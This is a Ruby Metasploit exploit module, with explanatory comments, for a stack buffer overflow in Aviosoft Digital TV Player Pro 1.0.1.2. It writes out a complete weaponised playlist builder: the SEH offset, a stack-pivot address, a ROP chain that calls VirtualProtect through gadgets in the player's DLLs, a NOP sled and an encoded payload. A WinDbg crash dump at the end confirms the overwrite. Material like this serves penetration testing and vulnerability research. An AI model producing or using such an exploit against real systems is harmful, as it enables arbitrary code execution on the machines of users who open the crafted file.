GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# File-format exploit module for Aviosoft Digital TV Player Pro 1.x.
#
# The module does no network I/O despite the Msf::Exploit::Remote base class:
# it assembles a single buffer (stack-pivot address, ROP chain, NOP sled,
# encoded payload, padding) and writes it to disk as a .plf playlist through
# the FILEFORMAT mixin's file_create. The player overflows a stack buffer when
# it copies the playlist contents (see the Description below).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  # Registers the module metadata (name, references, payload constraints,
  # per-target offsets and return address) and the FILENAME option that
  # names the generated playlist.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability found in Aviosoft Digital TV Player
          Pro version 1.x. An overflow occurs when the process copies the content of a
          playlist file on to the stack, which may result arbitrary code execution under
          the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'modpr0be', #Initial discovery, poc
          'sinn3r',   #Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '77043'],
          ['EDB', '18096'],
        ],
      'Payload'        =>
        {
          # Byte values the encoded payload must not contain.
          'BadChars'        => "\x00\x0a\x1a",
          'StackAdjustment' => -3500,
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => "seh",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Aviosoft DTV Player 1.0.1.2',
            {
              # 'Ret' is written into the buffer by #exploit at 'Offset' bytes;
              # 'Max' is the total file size #exploit pads the buffer up to.
              'Ret'    => 0x6130534a, #Stack pivot (ADD ESP,800; RET)
              'Offset' => 612,        #Offset to SEH
              'Max'    => 5000        #Max buffer size
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2011-11-09',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [false, 'The playlist name', 'msf.plf'])
      ])
  end

  # Returns n copies of one random 32-bit value, used as don't-care filler
  # between ROP gadgets. rand_text_alpha(4).unpack("L") yields a single
  # native-endian unsigned 32-bit integer; note that the same value is
  # repeated n times rather than n distinct random values being drawn.
  #
  # @param n [Integer] number of filler dwords to return
  # @return [Array<Integer>]
  def junk(n=1)
    return [rand_text_alpha(4).unpack("L")[0]] * n
  end

  # Returns n NOP-equivalent dwords. With rop=true the value is 0x61326003,
  # which the ROP chain in #exploit uses as a "ROP NOP"; otherwise it is
  # 0x90909090, four x86 NOP bytes packed into one dword.
  #
  # @param rop [Boolean] emit ROP NOPs instead of regular NOP bytes
  # @param n [Integer] number of dwords to return
  # @return [Array<Integer>]
  def nops(rop=false, n=1)
    return rop ? [0x61326003] * n : [0x90909090] * n
  end

  # Builds the playlist contents and writes them with file_create.
  #
  # The ROP chain is packed as little-endian dwords ("V*"); the per-gadget
  # comments name the instruction sequence and the DLL each address comes
  # from. The surrounding buffer layout, in order, is:
  #   'Offset' bytes of filler | target.ret (stack pivot) | 136 bytes filler |
  #   ROP chain | 32 NOPs | encoded payload | filler up to 'Max' bytes.
  def exploit
    rop = [
      nops(true, 10), #ROP NOP
      0x6405347a,     #POP EDX # RETN (MediaPlayerCtrl.dll)
      0x10011108,     #ptr to &VirtualProtect
      0x64010503,     #PUSH EDX # POP EAX # POP ESI # RETN (MediaPlayerCtrl.dll)
      junk,
      0x6160949f,     #MOV ECX,DWORD PTR DS:[EDX] # POP ESI (EPG.dll)
      junk(3),
      0x61604218,     #PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C (EPG.dll)
      junk(3),
      0x6403d1a6,     #POP EBP # RETN (MediaPlayerCtrl.dll)
      junk(3),
      0x60333560,     #& push esp # ret 0c (Configuration.dll)
      0x61323EA8,     #POP EAX # RETN (DTVDeviceManager.dll)
      0xA13977DF,     #0x00000343-> ebx
      0x640203fc,     #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)
      0x6163d37b,     #PUSH EAX # ADD AL,5E # POP EBX # RETN (EPG.dll)
      0x61626807,     #XOR EAX,EAX # RETN (EPG.dll)
      0x640203fc,     #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)
      0x6405347a,     #POP EDX # RETN (MediaPlayerCtrl.dll)
      0xA13974DC,     #0x00000040-> edx
      0x613107fb,     #ADD EDX,EAX # MOV EAX,EDX # RETN (DTVDeviceManager.dll)
      0x60326803,     #POP ECX # RETN (Configuration.dll)
      0x60350340,     #&Writable location
      0x61329e07,     #POP EDI # RETN (DTVDeviceManager.dll)
      nops(true),     #ROP NOP
      0x60340178,     #POP EAX # RETN
      nops,           #Regular NOPs
      0x60322e02      #PUSH # RETN
    ].flatten.pack("V*")

    buf = ''
    # buf is empty at this point, so this is exactly target['Offset'] bytes.
    buf << rand_text_alpha(target['Offset']-buf.length)
    # Per the target's 'Offset' comment this presumably lands in the SEH
    # handler slot; the pivot then lands execution in the ROP chain below.
    buf << [target.ret].pack('V*')
    buf << rand_text_alpha(136)
    buf << rop
    buf << make_nops(32)
    buf << payload.encoded
    # NOTE(review): assumes the buffer is still shorter than target['Max']
    # here; a negative length would mean the payload overran the file size
    # budget — confirm against the largest payload this module accepts.
    buf << rand_text_alpha(target['Max']-buf.length)

    file_create(buf)
  end
end
=begin
eax=00001779 ebx=047a02c0 ecx=000001f4 edx=047a6814 esi=047a77bc edi=00130000
eip=6400f6f0 esp=0012f038 ebp=00000001 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
MediaPlayerCtrl!DllCreateObject+0x220:
6400f6f0 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:000> !exchain
0012f3bc: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll -
DTVDeviceManager+534a (6130534a)
Invalid exception stack at 41414141
0:000> !address edi
00130000 : 00130000 - 00003000
Type 00040000 MEM_MAPPED
Protect 00000002 PAGE_READONLY
State 00001000 MEM_COMMIT
Usage RegionUsageIsVAD
0:000> !address esi
047a0000 : 047a0000 - 0000b000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageHeap
Handle 013c0000
=end